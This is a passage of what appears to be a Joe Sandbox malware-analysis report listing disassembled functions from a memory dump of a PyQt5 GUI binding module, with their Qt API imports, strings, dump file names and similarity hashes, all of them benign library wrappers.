Download Yara Rule

APIs

??0QVariant@@QEAA@_N@Z.QT5CORE ref: 00007FFB9A32D935
?setProperty@QTextFormat@@QEAAXHAEBVQVariant@@@Z.QT5GUI ref: 00007FFB9A32D948
??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FFB9A32D953

Strings

setFontFixedPitch, xrefs: 00007FFB9A32D98A
QTextCharFormat, xrefs: 00007FFB9A32D991
setFontFixedPitch(self, fixedPitch: bool), xrefs: 00007FFB9A32D97B

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Variant@@$?setFormat@@Property@TextVariant@@@
String ID: QTextCharFormat$setFontFixedPitch$setFontFixedPitch(self, fixedPitch: bool)
API String ID: 3865857979-3591156052
Opcode ID: 9359b850cd17ad64363c953d345f6c76e420a23e65edae64e8c61a16a3f35ab8
Instruction ID: 5024a8e5233ca4a8eb200ce78b8a84944cfd046a094e508928beb4a3b72a4e6e
Opcode Fuzzy Hash: 9359b850cd17ad64363c953d345f6c76e420a23e65edae64e8c61a16a3f35ab8
Instruction Fuzzy Hash: 4B212EB5A08B46D1EF20CF21E8896A937B8FB59784F954076DA9D03724DF3DD549C700

Function 00007FFB9A333A00 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43COMMON

Download Yara Rule

APIs

??0QVariant@@QEAA@N@Z.QT5CORE ref: 00007FFB9A333A66
?setProperty@QTextFormat@@QEAAXHAEBVQVariant@@@Z.QT5GUI ref: 00007FFB9A333A79
??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FFB9A333A84

Strings

QTextCharFormat, xrefs: 00007FFB9A333AC2
setFontLetterSpacing, xrefs: 00007FFB9A333ABB
setFontLetterSpacing(self, spacing: float), xrefs: 00007FFB9A333AAC

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Variant@@$?setFormat@@Property@TextVariant@@@
String ID: QTextCharFormat$setFontLetterSpacing$setFontLetterSpacing(self, spacing: float)
API String ID: 3865857979-3956914650
Opcode ID: 52e93a46e6a36499635e740c363fda9e76055aff7ff949dce43fbac55766585c
Instruction ID: 6739d541622c987af809943aee338f71f5161623bfbb3014e0a4febb0b711531
Opcode Fuzzy Hash: 52e93a46e6a36499635e740c363fda9e76055aff7ff949dce43fbac55766585c
Instruction Fuzzy Hash: 25210BB6608B4BD1EB209F25E8882A933B8FB45784FA14076DA4D43724DF3DE54AC740

Function 00007FFB9A33BA10 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 38COMMON

Download Yara Rule

APIs

?distanceToLine@QVector2D@@QEBAMAEBV1@0@Z.QT5GUI ref: 00007FFB9A33BA80
PyFloat_FromDouble.PYTHON3 ref: 00007FFB9A33BA8A

Strings

BJ9J9, xrefs: 00007FFB9A33BA3E
distanceToLine(self, point: QVector2D, direction: QVector2D) -> float, xrefs: 00007FFB9A33BA9C
QVector2D, xrefs: 00007FFB9A33BAB2
distanceToLine, xrefs: 00007FFB9A33BAAB

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?distanceDoubleFloat_FromLine@V1@0@Vector2
String ID: BJ9J9$QVector2D$distanceToLine$distanceToLine(self, point: QVector2D, direction: QVector2D) -> float
API String ID: 1543135828-405816686
Opcode ID: b8127b268a2bbf6dd7300f6d9f691489e5ef914b8f61927b9e049137e4a07284
Instruction ID: c133ca5425511cf53ab6c8a5f7187f207c484db4cf47a2c75c0c2073563456e9
Opcode Fuzzy Hash: b8127b268a2bbf6dd7300f6d9f691489e5ef914b8f61927b9e049137e4a07284
Instruction Fuzzy Hash: EA110AB6A18F46C1DB20DF60E8896AD33B8FB54784FA181B6CA9D47310DF39D999C350

Function 00007FFB9A30DEA0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 37threadCOMMON

Download Yara Rule

APIs

PyEval_SaveThread.PYTHON3 ref: 00007FFB9A30DEEB
?showNormal@QWindow@@QEAAXXZ.QT5GUI ref: 00007FFB9A30DEF9
PyEval_RestoreThread.PYTHON3 ref: 00007FFB9A30DF02

Strings

QWindow, xrefs: 00007FFB9A30DF3D
showNormal(self), xrefs: 00007FFB9A30DF2A
showNormal, xrefs: 00007FFB9A30DF36

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Eval_Thread$?showNormal@RestoreSaveWindow@@
String ID: QWindow$showNormal$showNormal(self)
API String ID: 426591181-900794078
Opcode ID: c5fd94cd696d468a522a48b1a41e003fb38d53b90f0e7a6bdef6da97b9826e45
Instruction ID: d937ae4c6f561a2be6e047d78d56b45e16dbbb2deca652d59331c1765f4d2107
Opcode Fuzzy Hash: c5fd94cd696d468a522a48b1a41e003fb38d53b90f0e7a6bdef6da97b9826e45
Instruction Fuzzy Hash: 971118B5A08B56C1EB609F21E8886A933B8FB49B84F9440B6CE4D03320CF7CD54AC740

Function 00007FFB9A30DC50 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 37threadCOMMON

Download Yara Rule

APIs

PyEval_SaveThread.PYTHON3 ref: 00007FFB9A30DC9B
?showFullScreen@QWindow@@QEAAXXZ.QT5GUI ref: 00007FFB9A30DCA9
PyEval_RestoreThread.PYTHON3 ref: 00007FFB9A30DCB2

Strings

showFullScreen, xrefs: 00007FFB9A30DCE6
QWindow, xrefs: 00007FFB9A30DCED
showFullScreen(self), xrefs: 00007FFB9A30DCDA

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Eval_Thread$?showFullRestoreSaveScreen@Window@@
String ID: QWindow$showFullScreen$showFullScreen(self)
API String ID: 1691872468-1449107341
Opcode ID: e38ce4d91b00c6bebc1a2a9cba344029768b7a11acf579c91095a18fee459245
Instruction ID: 1b99e83380881ee2e3b8182bf5a0cf0f4f1c66cbf006e3dfa78a6c22ce29ba6b
Opcode Fuzzy Hash: e38ce4d91b00c6bebc1a2a9cba344029768b7a11acf579c91095a18fee459245
Instruction Fuzzy Hash: 451118B5A18B56C1EB60DF21E8886A933A8FB49B84F9540B6CE4D03320CF7CD54AC740

Function 00007FFB9A2E7BE0 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 35COMMON

Download Yara Rule

APIs

?isSignalConnected@QObject@@IEBA_NAEBVQMetaMethod@@@Z.QT5CORE ref: 00007FFB9A2E7C43
PyBool_FromLong.PYTHON3 ref: 00007FFB9A2E7C4C

Strings

BJ9, xrefs: 00007FFB9A2E7C06
isSignalConnected, xrefs: 00007FFB9A2E7C6A
QValidator, xrefs: 00007FFB9A2E7C71
isSignalConnected(self, signal: QMetaMethod) -> bool, xrefs: 00007FFB9A2E7C5E

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Bool_Connected@FromLongMetaMethod@@@Object@@Signal
String ID: BJ9$QValidator$isSignalConnected$isSignalConnected(self, signal: QMetaMethod) -> bool
API String ID: 544305041-213352429
Opcode ID: 9cf68d400014dc3102c57e0a67e5e06fa5ba4949f53b0782a2d33e981d16a8d5
Instruction ID: eec27535827d7d0f3f9fff85d8956dc238e32d813fb09a60ed292b8e62ab74a6
Opcode Fuzzy Hash: 9cf68d400014dc3102c57e0a67e5e06fa5ba4949f53b0782a2d33e981d16a8d5
Instruction Fuzzy Hash: 461139B5A18F46D1EB10DF25E8896A933A9FB45B88FA140B2CA5C03320DF3DD599C340

Function 00007FFB9A32FC50 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 35COMMON

Download Yara Rule

APIs

?begin@QPainter@@QEAA_NPEAVQPaintDevice@@@Z.QT5GUI ref: 00007FFB9A32FCB3
PyBool_FromLong.PYTHON3 ref: 00007FFB9A32FCBC

Strings

begin(self, a0: Optional[QPaintDevice]) -> bool, xrefs: 00007FFB9A32FCCE
BJ8, xrefs: 00007FFB9A32FC76
begin, xrefs: 00007FFB9A32FCDA
QPainter, xrefs: 00007FFB9A32FCE1

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?begin@Bool_Device@@@FromLongPaintPainter@@
String ID: BJ8$QPainter$begin$begin(self, a0: Optional[QPaintDevice]) -> bool
API String ID: 3984307418-3860318878
Opcode ID: bb5f36534580da56cea98a54d2a69d215c2894297882dd4b0a9c1d3a65f71615
Instruction ID: 1e08a2873d2c63eb0a29c9191f3c82ce62c7de8f60f0e1a1dc73fb3a6c826769
Opcode Fuzzy Hash: bb5f36534580da56cea98a54d2a69d215c2894297882dd4b0a9c1d3a65f71615
Instruction Fuzzy Hash: 151139B5A18F46D1EB10DF25E8986A933A8FB84B84FA140B6CA5D13320DF3DD959C740

Function 00007FFB9A331BC0 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 34COMMON

Download Yara Rule

APIs

?isCopyOf@QTextCursor@@QEBA_NAEBV1@@Z.QT5GUI ref: 00007FFB9A331C1C
PyBool_FromLong.PYTHON3 ref: 00007FFB9A331C25

Strings

BJ9, xrefs: 00007FFB9A331BEE
isCopyOf(self, p: QPalette) -> bool, xrefs: 00007FFB9A331C37
QPalette, xrefs: 00007FFB9A331C4A
isCopyOf, xrefs: 00007FFB9A331C43

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Bool_CopyCursor@@FromLongTextV1@@
String ID: BJ9$QPalette$isCopyOf$isCopyOf(self, p: QPalette) -> bool
API String ID: 1629049401-1984342418
Opcode ID: 5638dcb58a6b2f3d1cd7bd179e4736624b571b24c1a62cd3d49bbffcf1faee26
Instruction ID: 0f98a0abf62de8f933d7c989dde21b6a86f5974be654cf636c75a70ff1a12033
Opcode Fuzzy Hash: 5638dcb58a6b2f3d1cd7bd179e4736624b571b24c1a62cd3d49bbffcf1faee26
Instruction Fuzzy Hash: 27111BB5A18F46C1EB10DF20E8986A933A9FB84B84FA14076CA5D03320CF3DD959C740

Function 00007FFB9A35FAD0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

?sizePixels@QPageSize@@QEBA?AVQSize@@H@Z.QT5GUI ref: 00007FFB9A35FB39
?sizePixels@QPageSize@@SA?AVQSize@@W4PageSizeId@1@H@Z.QT5GUI ref: 00007FFB9A35FBB0

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

Strings

sizePixels(self, resolution: int) -> QSizesizePixels(pageSizeId: QPageSize.PageSizeId, resolution: int) -> QSize, xrefs: 00007FFB9A35FBDD
QPageSize, xrefs: 00007FFB9A35FBF0
sizePixels, xrefs: 00007FFB9A35FBE9

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Size@@$Page$?sizePixels@$Id@1@Sizemalloc
String ID: QPageSize$sizePixels$sizePixels(self, resolution: int) -> QSizesizePixels(pageSizeId: QPageSize.PageSizeId, resolution: int) -> QSize
API String ID: 2324535246-1560509091
Opcode ID: 66e414b494ddf837f25a746e84172902b47f45ba007d1862b03aa6034a574a9e
